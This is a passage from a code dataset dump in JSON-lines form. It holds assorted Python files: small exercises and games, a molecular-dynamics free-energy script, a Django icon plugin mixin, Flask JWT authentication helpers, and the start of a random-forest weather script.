left')\nplt.savefig(\"Lecture16_03.png\",transparent=True)\nplt.show()\n","sub_path":"Exercise16/teach.py","file_name":"teach.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"106308996","text":"'''s1level64\nvar counter;\n\nfor (counter = 50; counter <= 90; counter += 10) {\n // draw_a_square\n for (var count = 0; count < 4; count++) {\n moveForward((counter));\n turnRight(90);\n }\n}\n'''\n\nimport turtle\n\nme = turtle.Turtle()\nme.pensize(7)\n\nfor counter in range(50,90,10):\n for count in range(4):\n me.forward(counter)\n me.right(90)\n \ninput()\n","sub_path":"s1level64.py","file_name":"s1level64.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"189333333","text":"import subprocess\nimport fileinput\nimport shutil\nimport numpy as np\nimport MDAnalysis\nfrom MDAnalysis.lib import distances\nimport numpy.linalg\nimport scipy.integrate as integrate\nfrom scipy.integrate import quad\nfrom numpy.linalg import norm\n\n### initiating constants and opening files \n\n#dist=np.zeros(1000)\ncount =0 \nkb = 306.432\nka1 = 57.788\nka2 = 61.243 \nint_free =0\nfree = open(\"free.dat\", \"w\")\nfreeint = open(\"final_free.dat\", \"w\")\nnumbin = 1000\n\nshutil.copyfile('again.data','type2.data')\ncell = [21.6209, 21.6209, 21.6209]\n\n#### loop of lambda values ###\n\nfor i in range(1, 11, 1):\n int_pr = 0\n count =0\n dusum = 0\n file = open(str(i)+\"-dist.dat\", \"w\")\n file1 = open(str(i)+\"-du.dat\", \"w\")\n\n# shutil.copyfile('again.data',str(i)+'.data')\n# shutil.copyfile('sim.in',str(i)+\".in\")\n# for line in fileinput.input(str(i)+\".in\", inplace=True):\n\n# print line.replace(\"again.data\",str(i)+'.data' ),\n \n# new= kb\n# ang1 = ka1\n ang2 = (float(i)/10.0)*ka2\n \n#### changing the bond and angle parameters\n \n# for line in fileinput.input(str(i)+'.data', inplace=True):\n\n# print line.replace(\"ch\", str(new)),\n\n# for line in fileinput.input(str(i)+'.data', inplace=True):\n# print line.replace(\"ang1\", str(ang1)),\n \n# for line in fileinput.input(str(i)+'.data', inplace=True):\n# print line.replace(\"ang2\", str(ang2)), \n\n ###### running lammps ###\n \n# subprocess.call([\"mpirun\", \"-np\", \"4\", \"lammps-daily\", \"-in\", str(i)+\".in\"])\n# shutil.copyfile('log.lammps',str(i)+\".lammps\")\n# shutil.copyfile('dump.dcd',str(i)+\".dcd\") \n\n ## reading in trajectory and setting up selections \n \n u = MDAnalysis.Universe('chargeFFat.psf',str(i)+\".dcd\")\n num = len(u.trajectory)\n# sel = u.select_atoms(\"bynum 751 \")\n# sel1 = u.select_atoms(\"bynum 732\")\n \n \n dist=np.zeros(num+1)\n du=np.zeros(num+1)\n deg=np.zeros(num+1)\n theta=np.zeros(num+1)\n ### loop for calculating distance information from trajectory \n \n for ts in u.trajectory:\n count = count+1\n A = u.select_atoms(\"bynum 732\").center_of_geometry()\n B = u.select_atoms(\"bynum 751 \").center_of_geometry()\n C = u.select_atoms(\"bynum 749 \").center_of_geometry()\n\n BA = A - B\n BC = C - B\n for h in range(0,3):\n if BA[h] > cell[h]/2.0:\n BA[h] = BA[h]-cell[h]\n for h in range(0,3):\n if BA[h] < -cell[h]/2.0:\n BA[h] = BA[h]+cell[h] \n for h in range(0,3):\n if BC[h] > cell[h]/2.0:\n BC[h] = BC[h]-cell[h]\n for h in range(0,3):\n if BC[h] < -cell[h]/2.0:\n BC[h] = BC[h]+cell[h]\n theta[count] = np.arccos(np.dot(BA, BC)/(norm(BA)*norm(BC)))\n deg[count] = np.rad2deg(theta[count])\n# print np.rad2deg(theta)\n\n# dist[count]=distances.distance_array(sel.positions, sel1.positions, box = [21.6209, 21.6209, 21.6209, 90, 90, 90])\n\n du[count] = 0.5*ka2*((theta[count]- np.deg2rad(109.6080))**2)\n\n dusum = du[count] + dusum\n \n hist, bin_edges = np.histogram(deg, bins=numbin, range=(0,180), density=True)\n# hi_du, bin_du = np.histogram(du, bins=1000, range=(0,100))\n\n#### loop for manipulating histogram ### \n \n for j in range(1, numbin, 1):\n\n bin = 0.1/float(numbin)\n mid = (bin_edges[j]+ bin_edges[j+1])/2.0\n hi = float(hist[j])*(0.5*ang2*((mid-1.5080)**2))\n# hidu = float(hi_du[j])/(float(num)*bin)\n int_pr = (hi *(bin)) + int_pr\n\n file.write(str(bin_edges[j])+\" \"+str(hist[j])+\"\\n\")\n file1.write(str(bin_edges[j])+\" \"+str(hi)+\"\\n\")\n avdusum = dusum/float(num)\n lam = float(i)/10.0\n free.write(str(lam)+\" \"+str(avdusum)+\"\\n\")\n# int_free = (avdusum*0.1)+int_free\n\n#freeint.write(str(int_pr)) \n","sub_path":"ti_one_test.py","file_name":"ti_one_test.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19272364","text":"names = ['Ali','Yağmur','Hakan','Deniz']\nyears = [1998, 2000, 1998, 1987]\n\n# 1- \"Cenk\" ismini listenin sonuna ekleyiniz.\nnames.append(\"Cenk\")\nprint(\"Names : \", names)\n\n# 2- \"Sena\" değerini listenin başına ekleyiniz.\n\n#names[0] = \"Sena\"\nnames.insert(0,\"Sena\")\nprint(\"Names : \",names)\n\n# 3- \"Deniz\" ismini listeden siliniz.\n\n#names.remove(\"Deniz\")\nnames.pop(3)\nprint(\"Names : \",names)\n\n# 4- \"Deniz\" isminin indeksi nedir ?\n\nnames.insert(3,\"Deniz\")\nprint(\"Names : \",names.index(\"Deniz\"))\n\n# 5- \"Ali\" listenin bir elemanı mıdır ?\n\nprint(\"Ali\" in names)\n\n# 6- Liste elemanlarını ters çevirin.\nnames.reverse()\nprint(names)\n\n# 7- Liste elemanlarını alfabetik olarak sıralayınız.\n\nnames.sort()\nprint(names)\n\n# 8- years listesini rakamsal büyüklüğe göre sıralayınız.\n\nyears.sort()\nprint(years)\n\n# 9- str = \"Chevrolet,Dacia\" karakter dizisini listeye çeviriniz.\nstr = \"Chevrolet,Dacia\"\nanotherStr = str.split(\",\")\nprint(anotherStr)\n\n# 10- years dizisinin en büyük ve en küçük elemanı nedir ?\n\nmin,max = min(years),max(years)\nprint(\"Min : \",min,\"Max : \",max)\n\n# 11- years dizisinde kaç tane 1998 değeri vardır ?\n\nprint(years.count(1998))\n\n# 12- years dizisinin tüm elemanlarını siliniz.\n\nyears.clear()\nprint(years)\n\n# 13- Kullanıcıdan alacağınız 3 tane marka bilgisini bir listede saklayınız.\n\nmarks = []\n\nmark1 = input(\"Marka : \")\nmarks.append(mark1)\n\nmark2 = input(\"Marka : \")\nmarks.append(mark2)\n\nmark3 = input(\"Marka : \")\nmarks.append(mark3)\n\n\nprint(marks)\n\n\n\n","sub_path":"ileriPython/list_method_demo.py","file_name":"list_method_demo.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634956949","text":"inp = open('pancakerevenge.in', 'r')\r\ndef input():\r\n return int(inp.readline())\r\nraw_input = inp.readline\r\n\r\nout = open('pancakerevenge.out', 'w')\r\n\r\nimport re\r\n\r\nT = input()\r\n\r\nfor t in range(1, T + 1):\r\n msg = raw_input().strip()\r\n msg = msg.rstrip('+')\r\n if len(msg) == 0:\r\n out.write(\"Case #\" + str(t) + \": 0\\n\")\r\n #print 0\r\n continue\r\n msg = ''.join(k * 2 for k in msg)\r\n ct = 0\r\n for pt in range(1, len(msg)):\r\n if msg[pt] != msg[pt - 1]:\r\n ct += 1\r\n out.write(\"Case #\" + str(t) + \": \" + str(ct + 1) + \"\\n\")\r\n #print ct + 1\r\n\r\nout.close()\r\n","sub_path":"codes/CodeJamCrawler/16_0_2/blockingthesky/pancakerevenge.py","file_name":"pancakerevenge.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518913336","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n \nimport xml.sax\n \nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\ndef parse_path(path):\n # 使用minidom解析器打开 XML 文档\n DOMTree = xml.dom.minidom.parse(path)\n root = DOMTree.documentElement\n \n files = root.getElementsByTagName(\"camitem\")\n\n cnt = 0;\n file_list = list()\n for file in files:\n if file.hasAttribute(\"script\"):\n file_list.append(file.getAttribute(\"script\"))\n cnt+=1\n print(cnt)\n return file_list\n\ndef appendAttribute(path):\n import re \n f=open(path,'r', errors='ignore') \n lines=f.readlines() \n f.close() \n f=open(path,'w+', errors='ignore') \n for eachline in lines: \n a=re.sub('= 1 ):\n guessed_letter = raw_input(\"\\nYou've guessed that letter before, try another one: \\n\")\n self.update_game(guessed_letter)\n self.draw_board(word)\n print('Game Over! Winner is....' + self.is_game_over()[1])\n print(\"The secret word was: \" + self.secret_word)\n self.restart()\n\n def update_game(self, letter):\n self.guessed_letters.append(letter)\n if (self.secret_word.count(letter) == 0):\n self.missed_letters.append(letter)\n\n for index in range(len(self.secret_word)):\n secret_letter = self.secret_word[index]\n if (letter == secret_letter):\n self.player_word = self.player_word[0:index] + letter + self.player_word[index+1:]\n \n def restart(self):\n restart = raw_input(\"Would you like to play again? (yes/no) \\n\")\n if (restart != \"yes\"):\n self.should_start = False\n\n# ASCII helpers\n\n def draw_board(self, word):\n board = self.get_current_board(len(self.missed_letters))\n\n missed_letters = \"\"\n for letter in self.missed_letters:\n missed_letters += letter + \" \"\n secret_word = \"Secret word: \" + self.player_word\n\n print(board)\n print(\"Missed Letters: \" + missed_letters)\n print(secret_word)\n\n\n def get_current_board(self, missed_count):\n boards = [\"\"\"\n H A N G M A N\n +---+\n | |\n |\n |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n O |\n |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n O |\n | |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n _O |\n | |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n _O_ |\n | |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n _O_ |\n | |\n / |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n _O_ |\n | |\n / \\ |\n |\n =========\n \"\"\"]\n return boards[missed_count]\n# Utility Functions\n\n # Return tuple: (game_over, Winner)\n def is_game_over(self):\n if (len(self.missed_letters) >= 6):\n return (True, \"Player 1\")\n elif (self.player_word == self.secret_word): \n return (True, \"Player 2\")\n else:\n return (False, \"\")\n \n\n# Begin! \ngame = HangmanGame()","sub_path":"HangManWordGame/src/Hangman-2.py","file_name":"Hangman-2.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127191739","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf.urls import url\nfrom django.http.response import JsonResponse, HttpResponseNotFound\nfrom django.utils.html import format_html\nfrom cmsplugin_cascade.models import IconFont\nfrom cmsplugin_cascade.plugin_base import CascadePluginMixinBase\n\n\nclass IconPluginMixin(CascadePluginMixinBase):\n change_form_template = 'cascade/admin/fonticon_plugin_change_form.html'\n ring_plugin = 'IconPluginMixin'\n require_icon_font = True # if False, the icon_font is optional\n\n class Media:\n css = {'all': ['cascade/css/admin/iconplugin.css']}\n js = ['cascade/js/admin/iconpluginmixin.js']\n\n @classmethod\n def get_identifier(cls, instance):\n identifier = super(IconPluginMixin, cls).get_identifier(instance)\n icon_font = cls.get_icon_font(instance)\n symbol = instance.glossary.get('symbol')\n if icon_font and symbol:\n prefix = icon_font.config_data['css_prefix_text']\n return format_html('{0}{1}{2}', identifier, prefix, symbol)\n return identifier\n\n def changeform_view(self, request, object_id=None, form_url='', extra_context=None):\n extra_context = dict(extra_context or {}, icon_fonts=IconFont.objects.all())\n return super(IconPluginMixin, self).changeform_view(\n request, object_id=object_id, form_url=form_url, extra_context=extra_context)\n\n def get_form(self, request, obj=None, **kwargs):\n icon_font_field = [gf for gf in self.glossary_fields if gf.name == 'icon_font'][0]\n icon_font_field.widget.choices = IconFont.objects.values_list('id', 'identifier')\n form = super(IconPluginMixin, self).get_form(request, obj=obj, **kwargs)\n return form\n\n def get_plugin_urls(self):\n urlpatterns = [\n url(r'^fetch_fonticons/(?P[0-9]+)$', self.fetch_fonticons),\n url(r'^fetch_fonticons/$', self.fetch_fonticons, name='fetch_fonticons'),\n ]\n urlpatterns.extend(super(IconPluginMixin, self).get_plugin_urls())\n return urlpatterns\n\n def fetch_fonticons(self, request, iconfont_id=None):\n try:\n icon_font = IconFont.objects.get(id=iconfont_id)\n except IconFont.DoesNotExist:\n return HttpResponseNotFound(\"IconFont with id={} does not exist\".format(iconfont_id))\n else:\n data = dict(icon_font.config_data)\n data.pop('glyphs', None)\n data['families'] = icon_font.get_icon_families()\n return JsonResponse(data)\n\n @classmethod\n def get_icon_font(self, instance):\n if not hasattr(instance, '_cached_icon_font'):\n try:\n instance._cached_icon_font = IconFont.objects.get(id=instance.glossary['icon_font'])\n except (IconFont.DoesNotExist, KeyError, ValueError):\n instance._cached_icon_font = None\n return instance._cached_icon_font\n\n def render(self, context, instance, placeholder):\n context['instance'] = instance\n icon_font = self.get_icon_font(instance)\n if icon_font:\n context['stylesheet_url'] = icon_font.get_stylesheet_url()\n return context\n","sub_path":"cmsplugin_cascade/icon/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"331411339","text":"from common import TreeNode\n\nclass Solution:\n def delNodes(self, root: TreeNode, to_delete: List[int]) -> List[TreeNode]:\n forest = []\n to_delete_set = set(to_delete)\n \n if root.val not in to_delete_set:\n forest.append(root)\n \n def dfs(node, parent_deleted=False):\n deleted = node.val in to_delete_set\n \n if not deleted and parent_deleted:\n forest.append(node)\n \n for i, child in enumerate([node.left, node.right]):\n if child:\n if dfs(child, deleted):\n if i == 0:\n node.left = None\n else:\n node.right = None\n \n return deleted\n \n dfs(root)\n return forest","sub_path":"LeetCode/p1110.py","file_name":"p1110.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"79907349","text":"\nimport json\nimport jwt\nfrom flask import request\n\nfrom src import app, redis\nfrom src.commons.constant import Msg\nfrom src.commons.date_utils import utc_timestamp\nfrom src.models.user import TbBusiness, TbUser, TbMerchantBusiness\n\n\ndef generate_token(user) -> str:\n\n token = jwt.encode({\"code\": user.code, \"time\": utc_timestamp()}, app.config[\"SECRET_KEY\"]).decode()\n key = \"support_jwt_{}\".format(user.code)\n data = {\n \"exp_time\": utc_timestamp()+24*60*60,\n \"token\": token}\n redis.set(key, value=json.dumps(data), ex=24*60*60)\n return token\n\n\ndef token_verify(token):\n try:\n data = jwt.decode(token, app.config[\"SECRET_KEY\"])\n code = data[\"code\"]\n key = \"support_jwt_{}\".format(code)\n data = json.loads(redis.get(key))\n if not data:\n return \"EXPIRED\"\n elif data.get(\"token\") != token:\n return \"OFFLINE\"\n else:\n user = TbUser.query.filter_by(code=code).first()\n if not user:\n return \"NOT_EXIST\"\n request.token = data\n # 更新 token\n redis.set(\n key,\n value=json.dumps({\n \"exp_time\": utc_timestamp()+24*60*60,\n \"token\": token}),\n ex=24*60*60)\n return user\n except TypeError:\n # 代表没有从 redis 中取得数据\n return \"EXPIRED\"\n except Exception as e:\n app.logger.info(\"obtain data error: {}\".format(str(e)))\n return \"INVALID\"\n\n\ndef permission_required(func):\n def decorator(*args, **kwargs):\n user = request.current_user\n path = request.path.replace(\"/api/v1\", \"\")\n method = request.method.upper()\n roles = user.roles\n # 获取当前用户所有的接口地址\n permission_path = [(i.path, i.method.upper()) for j in roles for i in j.interface]\n if user.is_admin or (path, method) in permission_path:\n return func(*args, **kwargs)\n return Msg.PERMISSION_DENIED, 403\n\n return decorator\n\n\ndef superuser_required(func):\n def decorator(*args, **kwargs):\n user = request.current_user\n if not user.is_admin:\n return Msg.PERMISSION_DENIED, 403\n return func(*args, **kwargs)\n\n return decorator\n\n\ndef appid_required(func):\n \"\"\"\n appid 要求\n :param func:\n :return:\n \"\"\"\n\n def decorator(*args, **kwargs):\n appid = request.headers.get(\"Appid\", None)\n biz = TbBusiness.query.filter_by(appid=appid, status=True).first()\n if appid is None or not biz:\n return Msg.USER_FORBIDDEN, 403\n try:\n user = request.current_user\n # 判断非 root 用户所在商户是否有访问改系统的权限\n if not user.is_admin:\n user_mer_biz = TbMerchantBusiness.query.filter_by(merchant_code=user.merchant.code).all()\n if biz.code not in [i.business_code for i in user_mer_biz]:\n return Msg.USER_FORBIDDEN, 403\n return func(*args, **kwargs)\n except AttributeError as e:\n return func(*args, **kwargs)\n\n return decorator\n\n\ndef token_required(func):\n \"\"\"\n token 要求\n :param func:\n :return:\n \"\"\"\n\n def decorator(*args, **kwargs):\n token = request.headers.get(\"Jwt\", None)\n if token is None:\n return Msg.NO_DATA, 401\n user = token_verify(token)\n if user == \"EXPIRED\":\n return Msg.TOKEN_EXPIRATION, 401\n elif user == \"INVALID\":\n return Msg.INVALID_TOKEN, 401\n elif user == \"NOT_EXIST\":\n return Msg.USER_NOT_EXISTS, 401\n elif user == \"OFFLINE\":\n return Msg.USER_OFFLINE, 401\n else:\n if not user.is_admin and not user.merchant:\n return Msg.NO_DATA, 403\n # 判断用户是否登录状态下被禁用\n if not user.active:\n return Msg.USER_IS_BANED, 403\n # 为 request 修改默认 user 属性\n request.current_user = user\n return func(*args, **kwargs)\n\n return decorator\n\n\ndef redis_delete(key):\n try:\n redis.delete(key)\n return True\n except Exception as e:\n return True\n\n\ndef token_appid_permission_required(func):\n\n @token_required\n @appid_required\n @permission_required\n def decorator(*args, **kwargs):\n return func(*args, **kwargs)\n return decorator\n","sub_path":"xxw/support/src/commons/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368137439","text":"import sys, random, time, pygame\nfrom pygame.locals import *\nimport L3_Setting_bf\nimport time\ndef print_text(font, x, y, text, color=(0,0,0)):\n imgText = font.render(text, True, color)\n screen.blit(imgText, (x,y))\n\npygame.init()\nscreen = pygame.display.set_mode((1000,600))\npygame.display.set_caption(\"typing game\")\nfont1 = pygame.font.Font(None, 100)\nfont2 = pygame.font.Font(None, 180)\nfont3 = pygame.font.Font(None, 90)\nfont4 = pygame.font.Font('simhei.ttf', 22)\n\nwhite = 255,255,255\nkey_flag = False\ncorrect_answer = 97 #\"a\"\nseconds = 31\nscore = 0\nclock_start = 0\ngame_over = True\n\nback = pygame.image.load('lesson3/back.png').convert_alpha()\nback = pygame.transform.smoothscale(back, (1000,600))\ndocNor = pygame.image.load('lesson3/normal.png').convert_alpha()\ndocNor = pygame.transform.smoothscale(docNor, (180,240))\ndocSmill = pygame.image.load('lesson3/smill.png').convert_alpha()\ndocSmill = pygame.transform.smoothscale(docSmill, (180,240))\ndocMad = pygame.image.load('lesson3/wrong.png').convert_alpha()\ndocMad = pygame.transform.smoothscale(docMad, (180,240))\nsetx, sety = L3_Setting_bf.setpos()\ndocFlag = 0 #0是normal,1是smile, 2是mad(wrong)\ncount = 0\n\nwhile True:\n time.sleep(0.01)\n keys = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == KEYDOWN and event.key != correct_answer and not game_over:\n print(correct_answer)\n docFlag = 2\n\n if keys[K_ESCAPE]:\n pygame.quit()\n sys.exit()\n\n if keys[K_RETURN]:\n if game_over:\n game_over = False\n score = 0\n seconds = 31\n r,g,b = L3_Setting_bf.setcolor()\n\n clock_start = time.clock()\n current = time.clock() - clock_start\n speed = score * 2\n if seconds-current < 0:\n game_over = True\n elif current <= 30:\n if keys[correct_answer] and not game_over:\n correct_answer = random.randint(97,122)\n score += 1\n setx,sety = L3_Setting_bf.setpos()\n docFlag = 1\n r,g,b = L3_Setting_bf.setcolor()\n\n screen.blit(back, (0,0))\n\n\n #切换三个图片\n if docFlag == 0:\n screen.blit(docNor, (670,180))\n r,g,b=L3_Setting_bf.setcolor()\n color=r,g,b\n elif docFlag == 1:\n screen.blit(docSmill, (670,180))\n r,g,b=L3_Setting_bf.setcolor()\n color=r,g,b\n elif docFlag == 2:#如果输入的字母是错误的\n screen.blit(docMad, (670,180))\n r=0\n g=0\n b=0\n color=r,g,b\n #课堂练习3(黑色变成红色)\n\n\n\n\n if docFlag != 0: # 让smill跟wrong图片停留一段时间\n count +=1\n if count == 90:\n count = 0\n docFlag = 0\n\n #显示倒计时\n if game_over:\n # print_text(font1, 0, 160, \"Press Enter to start...\")\n print_text(font1, 65, 53, '30')\n if not game_over:\n #字母颜色变化\n if r <= 225 and g <= 225 and b <= 225:\n r += random.randint(15,20)/100\n g += random.randint(15,20)/100\n b += random.randint(15,20)/100\n else:\n r = 205\n g = 205\n b = 155\n color = r,g,b\n\n if int(seconds-current) >=10:\n print_text(font1, 65, 53, str(int(seconds-current)))\n else:\n print_text(font1, 65, 53, ' ' + str(int(seconds-current)),(255,0,0))\n # print_text(font1, 0, 80, \"Time: \" + str(int(seconds-current)))\n\n #显示得分\n if speed < 10:\n speedStr = ' ' + str(speed)\n else:\n speedStr = str(speed)\n print_text(font3, 760, 110, speedStr)\n\n #显示大字母\n print_text(font2, setx, sety, chr(correct_answer-32), color)\n #显示游戏说明\n print_text(font4, 220, 450, ' 游戏规则:按下Enter键开始游戏')\n print_text(font4, 220, 480, ' 在键盘上敲下你看到的字母')\n print_text(font4, 220, 510, ' 看你能够得到多少分')\n\n\n pygame.display.update()\n","sub_path":"example/test/L3_Typing_bf.py","file_name":"L3_Typing_bf.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503222786","text":"from deck import Deck\n\nclass Player(object):\n \"\"\"\n Player has private_card_list which store the cards, name\n \"\"\"\n def __init__(self, playerName):\n self.private_card_list = []\n self.name = playerName\n self.points = 0\n\n def draw(self, deck):\n # Get the first card from the deck stack\n self.private_card_list.append(deck.cards[0])\n deck.removeTopCard()\n\n def calculate(self):\n # Figure out how many points\n points = 0\n numberOfAces = 0\n for card in self.private_card_list:\n temp = card.split()\n if temp[0].isdigit():\n points += int(temp[0])\n elif temp[0] == 'Ace':\n points += 11\n numberOfAces += 1\n else:\n points += 10\n\n while numberOfAces >0 and points > 21:\n numberOfAces -= 1\n points -= 10\n\n return points\n\n\n\n","sub_path":"BlackJack/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"11451165","text":"\"\"\"\nThe module checks if all results are present in the folder, with the correct\ntree structure.\nIf files are missing, it returns 0 and prints the respective paths in which\nthey should be, and their characteristics.\nIf the folder tree structure is complete, the function returns 1 and a message.\n\"\"\"\n\nimport numpy as np\nimport os\n\nprint('warning: the check depends on the file param_dict.npy \\n')\n# TODO: add check if the param_dict is coherent with the results files\n\n\ndef split_all(path):\n \"\"\"\n The function breaks out all of parts of a file or directory path\n \"\"\"\n all_parts = []\n while 1:\n parts = os.path.split(path)\n # absolute path case\n if parts[0] == path:\n all_parts.insert(0, parts[0])\n break\n # relative path case\n elif parts[1] == path:\n all_parts.insert(0, parts[1])\n break\n else:\n path = parts[0]\n all_parts.insert(0, parts[1])\n return all_parts\n\n\ndef check_tree_folder_structure(path):\n \"\"\"\n The function checks if the tree folder structure of 'results' contains\n all the files required by the analysis, and returns the specifics of the\n missing files, if any.\n\n Parameters:\n path : str.\n path of the results folder\n \"\"\"\n # load parameter dictionary\n param_dict = np.load('param_dict.npy').item()\n sessions = ['i140703-001', 'l101210-001']\n # set of all combination of epochs and trial types\n epochs = set(param_dict[str(sessions[0])].keys())\n # constructing set and list with all job numbers\n set_fim_folders = set()\n list_fim_folders = []\n flag_annotations = 1\n flag_filtered_res = 1\n flag_fim_folders = 1\n flag_patt_time_hist = 1\n flag_complete = 1\n for key1, value1 in param_dict.items():\n for key2, value2 in value1.items():\n jobs_within_epoch = []\n for key3, value3 in value2.items():\n jobs_within_epoch.append(str(key3))\n list_fim_folders.append(str(key3))\n set_fim_folders.add(tuple(jobs_within_epoch))\n # walking the tree folder structure\n for dirName, subdirList, fileList in os.walk(path):\n # check if the session level is complete\n if subdirList == sessions:\n if not os.path.exists(dirName + 'patt_time_hist.npy'):\n print('patt_time_hist.npy file missing in %s: \\n' %dirName)\n flag_patt_time_hist = 0\n # check if the epochs folder is complete\n if os.path.basename(dirName) in epochs:\n if not os.path.exists(dirName + '/annotations.npy'):\n print('annotations.npy file missing in: %s \\n' % dirName)\n flag_annotations = 0\n if not os.path.exists(dirName + '/filtered_res.npy'):\n print('filtered_res.npy file missing in: %s \\n' % dirName)\n flag_filtered_res = 0\n # check if the job number level is complete\n if os.path.basename(dirName) in list_fim_folders:\n if not os.path.exists(dirName + '/results.npy'):\n print('results.npy file missing in: %s' % dirName)\n # refer the parameters of the missing job through the\n # param_dict file\n print('the missing results characteristics are:')\n split_path = split_all(dirName)\n missing_file = param_dict[split_path[-3]][\n split_path[-2]][int(split_path[-1])]\n print(missing_file, '\\n')\n flag_fim_folders = 0\n flag = flag_complete * flag_annotations * flag_filtered_res * \\\n flag_complete * flag_fim_folders * flag_patt_time_hist\n if flag:\n print('folder tree structure is complete')\n return 1\n else:\n return 0\n\n\n# path of the results folder\npath = '../results/'\n\n# call of the function\ncheck_tree_folder_structure(path=path)\n","sub_path":"r2g_data/code/check_tree_folder_structure.py","file_name":"check_tree_folder_structure.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"193660715","text":"from setuptools import setup\n\n\ndef readme_file_contents():\n\twith open('README.rst') as readme_file:\n\t\tdata = readme_file.read()\n\treturn data\n\n\nsetup(\n\tname=\"ivchepot\",\n\tversion=\"1.0.0\",\n\tdescription=\"Simple TCP Honeypot\",\n\tlong_description=readme_file_contents(),\n\tauthor=\"Ivche1337\",\n\tauthor_email=\"ivchepro@gmail.com\",\n\tlicence=\"MIT\",\n\tpackages=[\"ivchepot\"],\n\tzip_safe=False,\n\tinstall_requires=[]\n)\n","sub_path":"pypi_install_script/ivchepot-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445104055","text":"#方法就是先排序,然后利用头尾指针找到两个数使得他们的和等于target,\ndef threeSum(nums):\n answer = []\n nums.sort()\n for a in range(len(nums)):\n if nums[a] > 0:\n break\n b = a + 1\n c = len(nums) - 1\n while b < c:\n if nums[b] + nums[c] > -nums[a]:\n c -= 1\n continue\n if nums[b] + nums[c] == -nums[a]:\n if [nums[a], nums[b], nums[c]] not in answer:\n answer.append([nums[a], nums[b], nums[c]])\n b += 1\n continue\n else:\n b += 1\n continue\n return answer\n\n\nif __name__ == '__main__':\n list = [-2, 0, 1, 1, 2]\n print(threeSum(list))\n","sub_path":"LeetCode/0015/best.py","file_name":"best.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"151586990","text":"import pandas as pd\nfrom random import seed\nfrom random import randrange\n\ndata = pd.read_csv(\"train.csv\").head(5000)\nprint(data.shape)\ndata = data.fillna(-1)\n\"\"\"\nDate,Location,MinTemp,MaxTemp,Rainfall,Evaporation,Sunshine,WindGustDir,WindGustSpeed,\nWindDir9am,WindDir3pm,WindSpeed9am,WindSpeed3pm,Humidity9am,Humidity3pm,Pressure9am,\nPressure3pm,Cloud9am,Cloud3pm,Temp9am,Temp3pm,RainToday,RainTomorrow\n\"\"\"\n\ndata.drop(labels=['Date', 'Location', 'WindDir9am', 'WindSpeed3pm', 'WindGustDir',], axis=1, inplace=True)\ndata.drop(labels=['WindDir3pm'], axis=1, inplace=True)\n\nprint(data.shape)\n\ndata.RainTomorrow = data.RainTomorrow.map({'No': 0, 'Yes': 1})\ndata.RainToday = data.RainToday.map({'No': 0, 'Yes': 1, 'nan': -1})\n\ndataSet = []\nfor x, y in data.iterrows():\n dataSet.append(y.values.tolist())\n\n\n# 除了标签列,其他列都转换为float类型\ndef column_to_float(dataSet):\n featLen = len(dataSet[0]) - 1\n for data in dataSet:\n for column in range(featLen):\n data[column] = float(data[column])\n\n\n# 将数据集随机分成N块,方便交叉验证,其中一块是测试集,其他四块是训练集\ndef spiltDataSet(dataSet, n_folds):\n fold_size = int(len(dataSet) / n_folds)\n dataSet_copy = list(dataSet)\n dataSet_spilt = []\n for i in range(n_folds):\n fold = []\n while len(fold) < fold_size: # 这里不能用if,if只是在第一次判断时起作用,while执行循环,直到条件不成立\n index = randrange(len(dataSet_copy))\n fold.append(dataSet_copy.pop(index)) # pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。\n dataSet_spilt.append(fold)\n return dataSet_spilt\n\n\n# 构造数据子集\ndef get_subsample(dataSet, ratio):\n subdataSet = []\n lenSubdata = round(len(dataSet) * ratio) # 返回浮点数\n while len(subdataSet) < lenSubdata:\n index = randrange(len(dataSet) - 